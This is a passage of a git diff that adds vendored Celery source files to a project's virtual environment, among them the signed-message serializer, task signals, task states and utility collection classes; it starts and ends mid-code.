salt_length=padding.PSS.MAX_LENGTH) + + return self._key.sign(ensure_bytes(data), pad, digest) diff --git a/env/Lib/site-packages/celery/security/serialization.py b/env/Lib/site-packages/celery/security/serialization.py new file mode 100644 index 00000000..c58ef906 --- /dev/null +++ b/env/Lib/site-packages/celery/security/serialization.py @@ -0,0 +1,101 @@ +"""Secure serializer.""" +from kombu.serialization import dumps, loads, registry +from kombu.utils.encoding import bytes_to_str, ensure_bytes, str_to_bytes + +from celery.app.defaults import DEFAULT_SECURITY_DIGEST +from celery.utils.serialization import b64decode, b64encode + +from .certificate import Certificate, FSCertStore +from .key import PrivateKey +from .utils import 
get_digest_algorithm, reraise_errors + +__all__ = ('SecureSerializer', 'register_auth') + + +class SecureSerializer: + """Signed serializer.""" + + def __init__(self, key=None, cert=None, cert_store=None, + digest=DEFAULT_SECURITY_DIGEST, serializer='json'): + self._key = key + self._cert = cert + self._cert_store = cert_store + self._digest = get_digest_algorithm(digest) + self._serializer = serializer + + def serialize(self, data): + """Serialize data structure into string.""" + assert self._key is not None + assert self._cert is not None + with reraise_errors('Unable to serialize: {0!r}', (Exception,)): + content_type, content_encoding, body = dumps( + bytes_to_str(data), serializer=self._serializer) + # What we sign is the serialized body, not the body itself. + # this way the receiver doesn't have to decode the contents + # to verify the signature (and thus avoiding potential flaws + # in the decoding step). + body = ensure_bytes(body) + return self._pack(body, content_type, content_encoding, + signature=self._key.sign(body, self._digest), + signer=self._cert.get_id()) + + def deserialize(self, data): + """Deserialize data structure from string.""" + assert self._cert_store is not None + with reraise_errors('Unable to deserialize: {0!r}', (Exception,)): + payload = self._unpack(data) + signature, signer, body = (payload['signature'], + payload['signer'], + payload['body']) + self._cert_store[signer].verify(body, signature, self._digest) + return loads(bytes_to_str(body), payload['content_type'], + payload['content_encoding'], force=True) + + def _pack(self, body, content_type, content_encoding, signer, signature, + sep=str_to_bytes('\x00\x01')): + fields = sep.join( + ensure_bytes(s) for s in [signer, signature, content_type, + content_encoding, body] + ) + return b64encode(fields) + + def _unpack(self, payload, sep=str_to_bytes('\x00\x01')): + raw_payload = b64decode(ensure_bytes(payload)) + first_sep = raw_payload.find(sep) + + signer = raw_payload[:first_sep] + signer_cert = self._cert_store[signer] + + # shift 3 bits right to get signature length + # 2048bit rsa key has a signature length of 256 + # 4096bit rsa key has a signature length of 512 + sig_len = signer_cert.get_pubkey().key_size >> 3 + sep_len = len(sep) + signature_start_position = first_sep + sep_len + signature_end_position = signature_start_position + sig_len + signature = raw_payload[ + signature_start_position:signature_end_position + ] + + v = raw_payload[signature_end_position + sep_len:].split(sep) + + return { + 'signer': signer, + 'signature': signature, + 'content_type': bytes_to_str(v[0]), + 'content_encoding': bytes_to_str(v[1]), + 'body': bytes_to_str(v[2]), + } + + +def register_auth(key=None, key_password=None, cert=None, store=None, + digest=DEFAULT_SECURITY_DIGEST, + serializer='json'): + """Register security serializer.""" + s = SecureSerializer(key and PrivateKey(key, password=key_password), + cert and Certificate(cert), + store and FSCertStore(store), + digest, serializer=serializer) + registry.register('auth', s.serialize, s.deserialize, + content_type='application/data', + content_encoding='utf-8') diff --git a/env/Lib/site-packages/celery/security/utils.py b/env/Lib/site-packages/celery/security/utils.py new file mode 100644 index 00000000..4714a945 --- /dev/null +++ b/env/Lib/site-packages/celery/security/utils.py @@ -0,0 +1,28 @@ +"""Utilities used by the message signing serializer.""" +import sys +from contextlib import contextmanager + +import cryptography.exceptions +from 
cryptography.hazmat.primitives import hashes + +from celery.exceptions import SecurityError, reraise + +__all__ = ('get_digest_algorithm', 'reraise_errors',) + + +def get_digest_algorithm(digest='sha256'): + """Convert string to hash object of cryptography library.""" + assert digest is not None + return getattr(hashes, digest.upper())() + + +@contextmanager +def reraise_errors(msg='{0!r}', errors=None): + """Context reraising crypto errors as :exc:`SecurityError`.""" + errors = (cryptography.exceptions,) if errors is None else errors + try: + yield + except errors as exc: + reraise(SecurityError, + SecurityError(msg.format(exc)), + sys.exc_info()[2]) diff --git a/env/Lib/site-packages/celery/signals.py b/env/Lib/site-packages/celery/signals.py new file mode 100644 index 00000000..290fa2ba --- /dev/null +++ b/env/Lib/site-packages/celery/signals.py @@ -0,0 +1,154 @@ +"""Celery Signals. + +This module defines the signals (Observer pattern) sent by +both workers and clients. + +Functions can be connected to these signals, and connected +functions are called whenever a signal is called. + +.. seealso:: + + :ref:`signals` for more information. +""" + +from .utils.dispatch import Signal + +__all__ = ( + 'before_task_publish', 'after_task_publish', 'task_internal_error', + 'task_prerun', 'task_postrun', 'task_success', + 'task_received', 'task_rejected', 'task_unknown', + 'task_retry', 'task_failure', 'task_revoked', 'celeryd_init', + 'celeryd_after_setup', 'worker_init', 'worker_before_create_process', + 'worker_process_init', 'worker_process_shutdown', 'worker_ready', + 'worker_shutdown', 'worker_shutting_down', 'setup_logging', + 'after_setup_logger', 'after_setup_task_logger', 'beat_init', + 'beat_embedded_init', 'heartbeat_sent', 'eventlet_pool_started', + 'eventlet_pool_preshutdown', 'eventlet_pool_postshutdown', + 'eventlet_pool_apply', +) + +# - Task +before_task_publish = Signal( + name='before_task_publish', + providing_args={ + 'body', 'exchange', 'routing_key', 'headers', + 'properties', 'declare', 'retry_policy', + }, +) +after_task_publish = Signal( + name='after_task_publish', + providing_args={'body', 'exchange', 'routing_key'}, +) +task_received = Signal( + name='task_received', + providing_args={'request'} +) +task_prerun = Signal( + name='task_prerun', + providing_args={'task_id', 'task', 'args', 'kwargs'}, +) +task_postrun = Signal( + name='task_postrun', + providing_args={'task_id', 'task', 'args', 'kwargs', 'retval'}, +) +task_success = Signal( + name='task_success', + providing_args={'result'}, +) +task_retry = Signal( + name='task_retry', + providing_args={'request', 'reason', 'einfo'}, +) +task_failure = Signal( + name='task_failure', + providing_args={ + 'task_id', 'exception', 'args', 'kwargs', 'traceback', 'einfo', + }, +) +task_internal_error = Signal( + name='task_internal_error', + providing_args={ + 'task_id', 'args', 'kwargs', 'request', 'exception', 'traceback', 'einfo' + } +) +task_revoked = Signal( + name='task_revoked', + providing_args={ + 'request', 'terminated', 'signum', 'expired', + }, +) +task_rejected = Signal( + name='task_rejected', + providing_args={'message', 'exc'}, +) +task_unknown = Signal( + name='task_unknown', + providing_args={'message', 'exc', 'name', 'id'}, +) +#: Deprecated, use after_task_publish instead. 
+task_sent = Signal( + name='task_sent', + providing_args={ + 'task_id', 'task', 'args', 'kwargs', 'eta', 'taskset', + }, +) + +# - Program: `celery worker` +celeryd_init = Signal( + name='celeryd_init', + providing_args={'instance', 'conf', 'options'}, +) +celeryd_after_setup = Signal( + name='celeryd_after_setup', + providing_args={'instance', 'conf'}, +) + +# - Worker +import_modules = Signal(name='import_modules') +worker_init = Signal(name='worker_init') +worker_before_create_process = Signal(name="worker_before_create_process") +worker_process_init = Signal(name='worker_process_init') +worker_process_shutdown = Signal(name='worker_process_shutdown') +worker_ready = Signal(name='worker_ready') +worker_shutdown = Signal(name='worker_shutdown') +worker_shutting_down = Signal(name='worker_shutting_down') +heartbeat_sent = Signal(name='heartbeat_sent') + +# - Logging +setup_logging = Signal( + name='setup_logging', + providing_args={ + 'loglevel', 'logfile', 'format', 'colorize', + }, +) +after_setup_logger = Signal( + name='after_setup_logger', + providing_args={ + 'logger', 'loglevel', 'logfile', 'format', 'colorize', + }, +) +after_setup_task_logger = Signal( + name='after_setup_task_logger', + providing_args={ + 'logger', 'loglevel', 'logfile', 'format', 'colorize', + }, +) + +# - Beat +beat_init = Signal(name='beat_init') +beat_embedded_init = Signal(name='beat_embedded_init') + +# - Eventlet +eventlet_pool_started = Signal(name='eventlet_pool_started') +eventlet_pool_preshutdown = Signal(name='eventlet_pool_preshutdown') +eventlet_pool_postshutdown = Signal(name='eventlet_pool_postshutdown') +eventlet_pool_apply = Signal( + name='eventlet_pool_apply', + providing_args={'target', 'args', 'kwargs'}, +) + +# - Programs +user_preload_options = Signal( + name='user_preload_options', + providing_args={'app', 'options'}, +) diff --git a/env/Lib/site-packages/celery/states.py b/env/Lib/site-packages/celery/states.py new file mode 100644 index 00000000..6e21a22b --- /dev/null +++ b/env/Lib/site-packages/celery/states.py @@ -0,0 +1,151 @@ +"""Built-in task states. + +.. _states: + +States +------ + +See :ref:`task-states`. + +.. _statesets: + +Sets +---- + +.. state:: READY_STATES + +READY_STATES +~~~~~~~~~~~~ + +Set of states meaning the task result is ready (has been executed). + +.. state:: UNREADY_STATES + +UNREADY_STATES +~~~~~~~~~~~~~~ + +Set of states meaning the task result is not ready (hasn't been executed). + +.. state:: EXCEPTION_STATES + +EXCEPTION_STATES +~~~~~~~~~~~~~~~~ + +Set of states meaning the task returned an exception. + +.. state:: PROPAGATE_STATES + +PROPAGATE_STATES +~~~~~~~~~~~~~~~~ + +Set of exception states that should propagate exceptions to the user. + +.. state:: ALL_STATES + +ALL_STATES +~~~~~~~~~~ + +Set of all possible states. + +Misc +---- + +""" + +__all__ = ( + 'PENDING', 'RECEIVED', 'STARTED', 'SUCCESS', 'FAILURE', + 'REVOKED', 'RETRY', 'IGNORED', 'READY_STATES', 'UNREADY_STATES', + 'EXCEPTION_STATES', 'PROPAGATE_STATES', 'precedence', 'state', +) + +#: State precedence. +#: None represents the precedence of an unknown state. +#: Lower index means higher precedence. +PRECEDENCE = [ + 'SUCCESS', + 'FAILURE', + None, + 'REVOKED', + 'STARTED', + 'RECEIVED', + 'REJECTED', + 'RETRY', + 'PENDING', +] + +#: Hash lookup of PRECEDENCE to index +PRECEDENCE_LOOKUP = dict(zip(PRECEDENCE, range(0, len(PRECEDENCE)))) +NONE_PRECEDENCE = PRECEDENCE_LOOKUP[None] + + +def precedence(state: str) -> int: + """Get the precedence index for state. 
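
Handlers attach to any of these signals with ``connect``; a small sketch (the handler body is illustrative only):

.. code-block:: python

    from celery.signals import celeryd_init

    @celeryd_init.connect
    def configure_worker(sender=None, conf=None, **kwargs):
        # called as `celery worker` starts up; `sender` is the node name
        conf.worker_prefetch_multiplier = 1
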
+ + Lower index means higher precedence. + """ + try: + return PRECEDENCE_LOOKUP[state] + except KeyError: + return NONE_PRECEDENCE + + +class state(str): + """Task state. + + State is a subclass of :class:`str`, implementing comparison + methods adhering to state precedence rules:: + + >>> from celery.states import state, PENDING, SUCCESS + + >>> state(PENDING) < state(SUCCESS) + True + + Any custom state is considered to be lower than :state:`FAILURE` and + :state:`SUCCESS`, but higher than any of the other built-in states:: + + >>> state('PROGRESS') > state(STARTED) + True + + >>> state('PROGRESS') > state('SUCCESS') + False + """ + + def __gt__(self, other: str) -> bool: + return precedence(self) < precedence(other) + + def __ge__(self, other: str) -> bool: + return precedence(self) <= precedence(other) + + def __lt__(self, other: str) -> bool: + return precedence(self) > precedence(other) + + def __le__(self, other: str) -> bool: + return precedence(self) >= precedence(other) + + +#: Task state is unknown (assumed pending since you know the id). +PENDING = 'PENDING' +#: Task was received by a worker (only used in events). +RECEIVED = 'RECEIVED' +#: Task was started by a worker (:setting:`task_track_started`). +STARTED = 'STARTED' +#: Task succeeded +SUCCESS = 'SUCCESS' +#: Task failed +FAILURE = 'FAILURE' +#: Task was revoked. +REVOKED = 'REVOKED' +#: Task was rejected (only used in events). +REJECTED = 'REJECTED' +#: Task is waiting for retry. +RETRY = 'RETRY' +IGNORED = 'IGNORED' + +READY_STATES = frozenset({SUCCESS, FAILURE, REVOKED}) +UNREADY_STATES = frozenset({PENDING, RECEIVED, STARTED, REJECTED, RETRY}) +EXCEPTION_STATES = frozenset({RETRY, FAILURE, REVOKED}) +PROPAGATE_STATES = frozenset({FAILURE, REVOKED}) + +ALL_STATES = frozenset({ + PENDING, RECEIVED, STARTED, SUCCESS, FAILURE, RETRY, REVOKED, +}) diff --git a/env/Lib/site-packages/celery/utils/__init__.py b/env/Lib/site-packages/celery/utils/__init__.py new file mode 100644 index 00000000..e905c247 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/__init__.py @@ -0,0 +1,37 @@ +"""Utility functions. + +Don't import from here directly anymore, as these are only +here for backwards compatibility. 
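
The precedence rules translate into ordinary comparisons, for example:

.. code-block:: python

    from celery import states

    states.precedence(states.SUCCESS)      # 0 -- highest precedence
    states.precedence('UNKNOWN-STATE')     # 2 -- falls back to the None slot
    states.state('PROGRESS') > states.state(states.STARTED)   # True
    states.state('PROGRESS') < states.state(states.SUCCESS)   # True
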
+""" +from kombu.utils.objects import cached_property +from kombu.utils.uuid import uuid + +from .functional import chunks, memoize, noop +from .imports import gen_task_name, import_from_cwd, instantiate +from .imports import qualname as get_full_cls_name +from .imports import symbol_by_name as get_cls_by_name +# ------------------------------------------------------------------------ # +# > XXX Compat +from .log import LOG_LEVELS +from .nodenames import nodename, nodesplit, worker_direct + +gen_unique_id = uuid + +__all__ = ( + 'LOG_LEVELS', + 'cached_property', + 'chunks', + 'gen_task_name', + 'gen_task_name', + 'gen_unique_id', + 'get_cls_by_name', + 'get_full_cls_name', + 'import_from_cwd', + 'instantiate', + 'memoize', + 'nodename', + 'nodesplit', + 'noop', + 'uuid', + 'worker_direct' +) diff --git a/env/Lib/site-packages/celery/utils/abstract.py b/env/Lib/site-packages/celery/utils/abstract.py new file mode 100644 index 00000000..81a04082 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/abstract.py @@ -0,0 +1,146 @@ +"""Abstract classes.""" +from abc import ABCMeta, abstractmethod +from collections.abc import Callable + +__all__ = ('CallableTask', 'CallableSignature') + + +def _hasattr(C, attr): + return any(attr in B.__dict__ for B in C.__mro__) + + +class _AbstractClass(metaclass=ABCMeta): + __required_attributes__ = frozenset() + + @classmethod + def _subclasshook_using(cls, parent, C): + return ( + cls is parent and + all(_hasattr(C, attr) for attr in cls.__required_attributes__) + ) or NotImplemented + + @classmethod + def register(cls, other): + # we override `register` to return other for use as a decorator. + type(cls).register(cls, other) + return other + + +class CallableTask(_AbstractClass, Callable): # pragma: no cover + """Task interface.""" + + __required_attributes__ = frozenset({ + 'delay', 'apply_async', 'apply', + }) + + @abstractmethod + def delay(self, *args, **kwargs): + pass + + @abstractmethod + def apply_async(self, *args, **kwargs): + pass + + @abstractmethod + def apply(self, *args, **kwargs): + pass + + @classmethod + def __subclasshook__(cls, C): + return cls._subclasshook_using(CallableTask, C) + + +class CallableSignature(CallableTask): # pragma: no cover + """Celery Signature interface.""" + + __required_attributes__ = frozenset({ + 'clone', 'freeze', 'set', 'link', 'link_error', '__or__', + }) + + @property + @abstractmethod + def name(self): + pass + + @property + @abstractmethod + def type(self): + pass + + @property + @abstractmethod + def app(self): + pass + + @property + @abstractmethod + def id(self): + pass + + @property + @abstractmethod + def task(self): + pass + + @property + @abstractmethod + def args(self): + pass + + @property + @abstractmethod + def kwargs(self): + pass + + @property + @abstractmethod + def options(self): + pass + + @property + @abstractmethod + def subtask_type(self): + pass + + @property + @abstractmethod + def chord_size(self): + pass + + @property + @abstractmethod + def immutable(self): + pass + + @abstractmethod + def clone(self, args=None, kwargs=None): + pass + + @abstractmethod + def freeze(self, id=None, group_id=None, chord=None, root_id=None, + group_index=None): + pass + + @abstractmethod + def set(self, immutable=None, **options): + pass + + @abstractmethod + def link(self, callback): + pass + + @abstractmethod + def link_error(self, errback): + pass + + @abstractmethod + def __or__(self, other): + pass + + @abstractmethod + def __invert__(self): + pass + + @classmethod + def __subclasshook__(cls, C): 
+ return cls._subclasshook_using(CallableSignature, C) diff --git a/env/Lib/site-packages/celery/utils/collections.py b/env/Lib/site-packages/celery/utils/collections.py new file mode 100644 index 00000000..6fb559ac --- /dev/null +++ b/env/Lib/site-packages/celery/utils/collections.py @@ -0,0 +1,864 @@ +"""Custom maps, sets, sequences, and other data structures.""" +import time +from collections import OrderedDict as _OrderedDict +from collections import deque +from collections.abc import Callable, Mapping, MutableMapping, MutableSet, Sequence +from heapq import heapify, heappop, heappush +from itertools import chain, count +from queue import Empty +from typing import Any, Dict, Iterable, List # noqa + +from .functional import first, uniq +from .text import match_case + +try: + # pypy: dicts are ordered in recent versions + from __pypy__ import reversed_dict as _dict_is_ordered +except ImportError: + _dict_is_ordered = None + +try: + from django.utils.functional import LazyObject, LazySettings +except ImportError: + class LazyObject: + pass + LazySettings = LazyObject + +__all__ = ( + 'AttributeDictMixin', 'AttributeDict', 'BufferMap', 'ChainMap', + 'ConfigurationView', 'DictAttribute', 'Evictable', + 'LimitedSet', 'Messagebuffer', 'OrderedDict', + 'force_mapping', 'lpmerge', +) + +REPR_LIMITED_SET = """\ +<{name}({size}): maxlen={0.maxlen}, expires={0.expires}, minlen={0.minlen}>\ +""" + + +def force_mapping(m): + # type: (Any) -> Mapping + """Wrap object into supporting the mapping interface if necessary.""" + if isinstance(m, (LazyObject, LazySettings)): + m = m._wrapped + return DictAttribute(m) if not isinstance(m, Mapping) else m + + +def lpmerge(L, R): + # type: (Mapping, Mapping) -> Mapping + """In place left precedent dictionary merge. + + Keeps values from `L`, if the value in `R` is :const:`None`. + """ + setitem = L.__setitem__ + [setitem(k, v) for k, v in R.items() if v is not None] + return L + + +class OrderedDict(_OrderedDict): + """Dict where insertion order matters.""" + + def _LRUkey(self): + # type: () -> Any + # return value of od.keys does not support __next__, + # but this version will also not create a copy of the list. + return next(iter(self.keys())) + + if not hasattr(_OrderedDict, 'move_to_end'): + if _dict_is_ordered: # pragma: no cover + + def move_to_end(self, key, last=True): + # type: (Any, bool) -> None + if not last: + # we don't use this argument, and the only way to + # implement this on PyPy seems to be O(n): creating a + # copy with the order changed, so we just raise. + raise NotImplementedError('no last=True on PyPy') + self[key] = self.pop(key) + + else: + + def move_to_end(self, key, last=True): + # type: (Any, bool) -> None + link = self._OrderedDict__map[key] + link_prev = link[0] + link_next = link[1] + link_prev[1] = link_next + link_next[0] = link_prev + root = self._OrderedDict__root + if last: + last = root[0] + link[0] = last + link[1] = root + last[1] = root[0] = link + else: + first_node = root[1] + link[0] = root + link[1] = first_node + root[1] = first_node[0] = link + + +class AttributeDictMixin: + """Mixin for Mapping interface that adds attribute access. + + I.e., `d.key -> d[key]`). 
+ """ + + def __getattr__(self, k): + # type: (str) -> Any + """`d.key -> d[key]`.""" + try: + return self[k] + except KeyError: + raise AttributeError( + f'{type(self).__name__!r} object has no attribute {k!r}') + + def __setattr__(self, key: str, value) -> None: + """`d[key] = value -> d.key = value`.""" + self[key] = value + + +class AttributeDict(dict, AttributeDictMixin): + """Dict subclass with attribute access.""" + + +class DictAttribute: + """Dict interface to attributes. + + `obj[k] -> obj.k` + `obj[k] = val -> obj.k = val` + """ + + obj = None + + def __init__(self, obj): + # type: (Any) -> None + object.__setattr__(self, 'obj', obj) + + def __getattr__(self, key): + # type: (Any) -> Any + return getattr(self.obj, key) + + def __setattr__(self, key, value): + # type: (Any, Any) -> None + return setattr(self.obj, key, value) + + def get(self, key, default=None): + # type: (Any, Any) -> Any + try: + return self[key] + except KeyError: + return default + + def setdefault(self, key, default=None): + # type: (Any, Any) -> None + if key not in self: + self[key] = default + + def __getitem__(self, key): + # type: (Any) -> Any + try: + return getattr(self.obj, key) + except AttributeError: + raise KeyError(key) + + def __setitem__(self, key, value): + # type: (Any, Any) -> Any + setattr(self.obj, key, value) + + def __contains__(self, key): + # type: (Any) -> bool + return hasattr(self.obj, key) + + def _iterate_keys(self): + # type: () -> Iterable + return iter(dir(self.obj)) + iterkeys = _iterate_keys + + def __iter__(self): + # type: () -> Iterable + return self._iterate_keys() + + def _iterate_items(self): + # type: () -> Iterable + for key in self._iterate_keys(): + yield key, getattr(self.obj, key) + iteritems = _iterate_items + + def _iterate_values(self): + # type: () -> Iterable + for key in self._iterate_keys(): + yield getattr(self.obj, key) + itervalues = _iterate_values + + items = _iterate_items + keys = _iterate_keys + values = _iterate_values + + +MutableMapping.register(DictAttribute) + + +class ChainMap(MutableMapping): + """Key lookup on a sequence of maps.""" + + key_t = None + changes = None + defaults = None + maps = None + _observers = () + + def __init__(self, *maps, **kwargs): + # type: (*Mapping, **Any) -> None + maps = list(maps or [{}]) + self.__dict__.update( + key_t=kwargs.get('key_t'), + maps=maps, + changes=maps[0], + defaults=maps[1:], + _observers=[], + ) + + def add_defaults(self, d): + # type: (Mapping) -> None + d = force_mapping(d) + self.defaults.insert(0, d) + self.maps.insert(1, d) + + def pop(self, key, *default): + # type: (Any, *Any) -> Any + try: + return self.maps[0].pop(key, *default) + except KeyError: + raise KeyError( + f'Key not found in the first mapping: {key!r}') + + def __missing__(self, key): + # type: (Any) -> Any + raise KeyError(key) + + def _key(self, key): + # type: (Any) -> Any + return self.key_t(key) if self.key_t is not None else key + + def __getitem__(self, key): + # type: (Any) -> Any + _key = self._key(key) + for mapping in self.maps: + try: + return mapping[_key] + except KeyError: + pass + return self.__missing__(key) + + def __setitem__(self, key, value): + # type: (Any, Any) -> None + self.changes[self._key(key)] = value + + def __delitem__(self, key): + # type: (Any) -> None + try: + del self.changes[self._key(key)] + except KeyError: + raise KeyError(f'Key not found in first mapping: {key!r}') + + def clear(self): + # type: () -> None + self.changes.clear() + + def get(self, key, default=None): + # type: (Any, 
Any) -> Any + try: + return self[self._key(key)] + except KeyError: + return default + + def __len__(self): + # type: () -> int + return len(set().union(*self.maps)) + + def __iter__(self): + return self._iterate_keys() + + def __contains__(self, key): + # type: (Any) -> bool + key = self._key(key) + return any(key in m for m in self.maps) + + def __bool__(self): + # type: () -> bool + return any(self.maps) + __nonzero__ = __bool__ # Py2 + + def setdefault(self, key, default=None): + # type: (Any, Any) -> None + key = self._key(key) + if key not in self: + self[key] = default + + def update(self, *args, **kwargs): + # type: (*Any, **Any) -> Any + result = self.changes.update(*args, **kwargs) + for callback in self._observers: + callback(*args, **kwargs) + return result + + def __repr__(self): + # type: () -> str + return '{0.__class__.__name__}({1})'.format( + self, ', '.join(map(repr, self.maps))) + + @classmethod + def fromkeys(cls, iterable, *args): + # type: (type, Iterable, *Any) -> 'ChainMap' + """Create a ChainMap with a single dict created from the iterable.""" + return cls(dict.fromkeys(iterable, *args)) + + def copy(self): + # type: () -> 'ChainMap' + return self.__class__(self.maps[0].copy(), *self.maps[1:]) + __copy__ = copy # Py2 + + def _iter(self, op): + # type: (Callable) -> Iterable + # defaults must be first in the stream, so values in + # changes take precedence. + # pylint: disable=bad-reversed-sequence + # Someone should teach pylint about properties. + return chain(*(op(d) for d in reversed(self.maps))) + + def _iterate_keys(self): + # type: () -> Iterable + return uniq(self._iter(lambda d: d.keys())) + iterkeys = _iterate_keys + + def _iterate_items(self): + # type: () -> Iterable + return ((key, self[key]) for key in self) + iteritems = _iterate_items + + def _iterate_values(self): + # type: () -> Iterable + return (self[key] for key in self) + itervalues = _iterate_values + + def bind_to(self, callback): + self._observers.append(callback) + + keys = _iterate_keys + items = _iterate_items + values = _iterate_values + + +class ConfigurationView(ChainMap, AttributeDictMixin): + """A view over an applications configuration dictionaries. + + Custom (but older) version of :class:`collections.ChainMap`. + + If the key does not exist in ``changes``, the ``defaults`` + dictionaries are consulted. + + Arguments: + changes (Mapping): Map of configuration changes. + defaults (List[Mapping]): List of dictionaries containing + the default configuration. 
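
As a usage sketch of the chained lookup: reads consult each map in order, while writes always go to the first ("changes") map.

.. code-block:: python

    from celery.utils.collections import ChainMap

    defaults = {'timeout': 10, 'retries': 3}
    changes = {}
    conf = ChainMap(changes, defaults)

    conf['timeout']         # 10 -- found in defaults
    conf['timeout'] = 1     # stored in `changes`, defaults stay untouched
    dict(changes)           # {'timeout': 1}
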
+ """ + + def __init__(self, changes, defaults=None, keys=None, prefix=None): + # type: (Mapping, Mapping, List[str], str) -> None + defaults = [] if defaults is None else defaults + super().__init__(changes, *defaults) + self.__dict__.update( + prefix=prefix.rstrip('_') + '_' if prefix else prefix, + _keys=keys, + ) + + def _to_keys(self, key): + # type: (str) -> Sequence[str] + prefix = self.prefix + if prefix: + pkey = prefix + key if not key.startswith(prefix) else key + return match_case(pkey, prefix), key + return key, + + def __getitem__(self, key): + # type: (str) -> Any + keys = self._to_keys(key) + getitem = super().__getitem__ + for k in keys + ( + tuple(f(key) for f in self._keys) if self._keys else ()): + try: + return getitem(k) + except KeyError: + pass + try: + # support subclasses implementing __missing__ + return self.__missing__(key) + except KeyError: + if len(keys) > 1: + raise KeyError( + 'Key not found: {0!r} (with prefix: {0!r})'.format(*keys)) + raise + + def __setitem__(self, key, value): + # type: (str, Any) -> Any + self.changes[self._key(key)] = value + + def first(self, *keys): + # type: (*str) -> Any + return first(None, (self.get(key) for key in keys)) + + def get(self, key, default=None): + # type: (str, Any) -> Any + try: + return self[key] + except KeyError: + return default + + def clear(self): + # type: () -> None + """Remove all changes, but keep defaults.""" + self.changes.clear() + + def __contains__(self, key): + # type: (str) -> bool + keys = self._to_keys(key) + return any(any(k in m for k in keys) for m in self.maps) + + def swap_with(self, other): + # type: (ConfigurationView) -> None + changes = other.__dict__['changes'] + defaults = other.__dict__['defaults'] + self.__dict__.update( + changes=changes, + defaults=defaults, + key_t=other.__dict__['key_t'], + prefix=other.__dict__['prefix'], + maps=[changes] + defaults + ) + + +class LimitedSet: + """Kind-of Set (or priority queue) with limitations. + + Good for when you need to test for membership (`a in set`), + but the set should not grow unbounded. + + ``maxlen`` is enforced at all times, so if the limit is reached + we'll also remove non-expired items. + + You can also configure ``minlen``: this is the minimal residual size + of the set. + + All arguments are optional, and no limits are enabled by default. + + Arguments: + maxlen (int): Optional max number of items. + Adding more items than ``maxlen`` will result in immediate + removal of items sorted by oldest insertion time. + + expires (float): TTL for all items. + Expired items are purged as keys are inserted. + + minlen (int): Minimal residual size of this set. + .. versionadded:: 4.0 + + Value must be less than ``maxlen`` if both are configured. + + Older expired items will be deleted, only after the set + exceeds ``minlen`` number of items. + + data (Sequence): Initial data to initialize set with. + Can be an iterable of ``(key, value)`` pairs, + a dict (``{key: insertion_time}``), or another instance + of :class:`LimitedSet`. + + Example: + >>> s = LimitedSet(maxlen=50000, expires=3600, minlen=4000) + >>> for i in range(60000): + ... s.add(i) + ... s.add(str(i)) + ... + >>> 57000 in s # last 50k inserted values are kept + True + >>> '10' in s # '10' did expire and was purged from set. 
+ False + >>> len(s) # maxlen is reached + 50000 + >>> s.purge(now=time.monotonic() + 7200) # clock + 2 hours + >>> len(s) # now only minlen items are cached + 4000 + >>>> 57000 in s # even this item is gone now + False + """ + + max_heap_percent_overload = 15 + + def __init__(self, maxlen=0, expires=0, data=None, minlen=0): + # type: (int, float, Mapping, int) -> None + self.maxlen = 0 if maxlen is None else maxlen + self.minlen = 0 if minlen is None else minlen + self.expires = 0 if expires is None else expires + self._data = {} + self._heap = [] + + if data: + # import items from data + self.update(data) + + if not self.maxlen >= self.minlen >= 0: + raise ValueError( + 'minlen must be a positive number, less or equal to maxlen.') + if self.expires < 0: + raise ValueError('expires cannot be negative!') + + def _refresh_heap(self): + # type: () -> None + """Time consuming recreating of heap. Don't run this too often.""" + self._heap[:] = [entry for entry in self._data.values()] + heapify(self._heap) + + def _maybe_refresh_heap(self): + # type: () -> None + if self._heap_overload >= self.max_heap_percent_overload: + self._refresh_heap() + + def clear(self): + # type: () -> None + """Clear all data, start from scratch again.""" + self._data.clear() + self._heap[:] = [] + + def add(self, item, now=None): + # type: (Any, float) -> None + """Add a new item, or reset the expiry time of an existing item.""" + now = now or time.monotonic() + if item in self._data: + self.discard(item) + entry = (now, item) + self._data[item] = entry + heappush(self._heap, entry) + if self.maxlen and len(self._data) >= self.maxlen: + self.purge() + + def update(self, other): + # type: (Iterable) -> None + """Update this set from other LimitedSet, dict or iterable.""" + if not other: + return + if isinstance(other, LimitedSet): + self._data.update(other._data) + self._refresh_heap() + self.purge() + elif isinstance(other, dict): + # revokes are sent as a dict + for key, inserted in other.items(): + if isinstance(inserted, (tuple, list)): + # in case someone uses ._data directly for sending update + inserted = inserted[0] + if not isinstance(inserted, float): + raise ValueError( + 'Expecting float timestamp, got type ' + f'{type(inserted)!r} with value: {inserted}') + self.add(key, inserted) + else: + # XXX AVOID THIS, it could keep old data if more parties + # exchange them all over and over again + for obj in other: + self.add(obj) + + def discard(self, item): + # type: (Any) -> None + # mark an existing item as removed. If KeyError is not found, pass. + self._data.pop(item, None) + self._maybe_refresh_heap() + pop_value = discard + + def purge(self, now=None): + # type: (float) -> None + """Check oldest items and remove them if needed. + + Arguments: + now (float): Time of purging -- by default right now. + This can be useful for unit testing. 
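+
+        Example (an illustrative sketch; the values are arbitrary):
+            >>> import time
+            >>> s = LimitedSet(maxlen=10, expires=1.0)
+            >>> s.add('x', now=time.monotonic() - 5.0)
+            >>> s.purge(now=time.monotonic())
+            >>> 'x' in s
+            False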
+ """ + now = now or time.monotonic() + now = now() if isinstance(now, Callable) else now + if self.maxlen: + while len(self._data) > self.maxlen: + self.pop() + # time based expiring: + if self.expires: + while len(self._data) > self.minlen >= 0: + inserted_time, _ = self._heap[0] + if inserted_time + self.expires > now: + break # oldest item hasn't expired yet + self.pop() + + def pop(self, default=None) -> Any: + # type: (Any) -> Any + """Remove and return the oldest item, or :const:`None` when empty.""" + while self._heap: + _, item = heappop(self._heap) + try: + self._data.pop(item) + except KeyError: + pass + else: + return item + return default + + def as_dict(self): + # type: () -> Dict + """Whole set as serializable dictionary. + + Example: + >>> s = LimitedSet(maxlen=200) + >>> r = LimitedSet(maxlen=200) + >>> for i in range(500): + ... s.add(i) + ... + >>> r.update(s.as_dict()) + >>> r == s + True + """ + return {key: inserted for inserted, key in self._data.values()} + + def __eq__(self, other): + # type: (Any) -> bool + return self._data == other._data + + def __repr__(self): + # type: () -> str + return REPR_LIMITED_SET.format( + self, name=type(self).__name__, size=len(self), + ) + + def __iter__(self): + # type: () -> Iterable + return (i for _, i in sorted(self._data.values())) + + def __len__(self): + # type: () -> int + return len(self._data) + + def __contains__(self, key): + # type: (Any) -> bool + return key in self._data + + def __reduce__(self): + # type: () -> Any + return self.__class__, ( + self.maxlen, self.expires, self.as_dict(), 